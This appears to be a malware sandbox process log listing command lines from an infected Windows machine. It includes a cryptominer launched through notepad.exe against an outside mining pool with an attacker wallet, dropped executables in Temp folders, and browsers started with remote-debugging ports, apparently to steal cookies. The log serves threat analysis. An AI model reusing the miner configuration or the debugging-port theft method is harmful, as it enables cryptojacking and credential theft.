"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,8541805074617763421,13249142319222219787,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2096 /prefetch:2

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ntpfhbq2\ntpfhbq2.cmdline"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,8541805074617763421,13249142319222219787,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2480 /prefetch:2

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4B8B.tmp" "c:\Users\Admin\AppData\Local\Temp\ntpfhbq2\CSCB7AF5E2C67F1428B9E672F2429D6693D.TMP"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,8541805074617763421,13249142319222219787,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4844 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,8541805074617763421,13249142319222219787,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2224 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2092,8541805074617763421,13249142319222219787,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5044 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2092,8541805074617763421,13249142319222219787,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5104 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,8541805074617763421,13249142319222219787,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4820 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,8541805074617763421,13249142319222219787,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=1976 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,8541805074617763421,13249142319222219787,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=5188 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\10110250101\FvbuInU.exe

"C:\Users\Admin\AppData\Local\Temp\10110250101\FvbuInU.exe"

C:\Windows\System32\notepad.exe

--donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=40

C:\Users\Admin\AppData\Local\Temp\10110260101\Ps7WqSx.exe

"C:\Users\Admin\AppData\Local\Temp\10110260101\Ps7WqSx.exe"

C:\Users\Admin\AppData\Local\Temp\10110270101\nhDLtPT.exe

"C:\Users\Admin\AppData\Local\Temp\10110270101\nhDLtPT.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe

"C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "PID eq 960"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff99db4cc40,0x7ff99db4cc4c,0x7ff99db4cc58

C:\Users\Admin\AppData\Local\Temp\10110290101\rXOl0pp.exe

"C:\Users\Admin\AppData\Local\Temp\10110290101\rXOl0pp.exe"

C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe

"C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2256,i,15713520420903099006,5771375587645475105,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2264 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1596,i,15713520420903099006,5771375587645475105,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2316 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1900,i,15713520420903099006,5771375587645475105,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2448 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff99db4cc40,0x7ff99db4cc4c,0x7ff99db4cc58

C:\Users\Admin\AppData\Local\Temp\10110310101\b0fc94a113.exe

"C:\Users\Admin\AppData\Local\Temp\10110310101\b0fc94a113.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff99d3646f8,0x7ff99d364708,0x7ff99d364718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,6045276845371632854,11495814118856295916,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,6045276845371632854,11495814118856295916,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,6045276845371632854,11495814118856295916,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2448 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2124,6045276845371632854,11495814118856295916,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2124,6045276845371632854,11495814118856295916,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\10110320101\1d96b73593.exe

"C:\Users\Admin\AppData\Local\Temp\10110320101\1d96b73593.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Users\Admin\AppData\Local\Temp\10110320101\1d96b73593.exe

"C:\Users\Admin\AppData\Local\Temp\10110320101\1d96b73593.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff99db4cc40,0x7ff99db4cc4c,0x7ff99db4cc58

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 2016 -ip 2016

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2016 -s 808

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2400,i,7663933257849960815,13405961648069094795,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2392 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1900,i,7663933257849960815,13405961648069094795,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2436 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1972,i,7663933257849960815,13405961648069094795,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2540 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2124,6045276845371632854,11495814118856295916,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4728 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,6045276845371632854,11495814118856295916,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2124,6045276845371632854,11495814118856295916,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4768 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3128,i,7663933257849960815,13405961648069094795,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3140 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3148,i,7663933257849960815,13405961648069094795,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3192 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3160,i,7663933257849960815,13405961648069094795,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4540 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4676,i,7663933257849960815,13405961648069094795,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4668 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4824,i,7663933257849960815,13405961648069094795,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4896 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4828,i,7663933257849960815,13405961648069094795,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4992 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,6045276845371632854,11495814118856295916,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2128 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,6045276845371632854,11495814118856295916,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2932 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\ProgramData\rvhetm\ktgtc.exe

C:\ProgramData\rvhetm\ktgtc.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "PID eq 960"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\10110330101\9d1cfbdeaf.exe

"C:\Users\Admin\AppData\Local\Temp\10110330101\9d1cfbdeaf.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff99d3646f8,0x7ff99d364708,0x7ff99d364718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,9011399044491333635,6514709473298848053,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,9011399044491333635,6514709473298848053,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,9011399044491333635,6514709473298848053,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2660 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2120,9011399044491333635,6514709473298848053,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2956 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2120,9011399044491333635,6514709473298848053,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2972 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,9011399044491333635,6514709473298848053,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,9011399044491333635,6514709473298848053,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2120,9011399044491333635,6514709473298848053,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4732 /prefetch:1

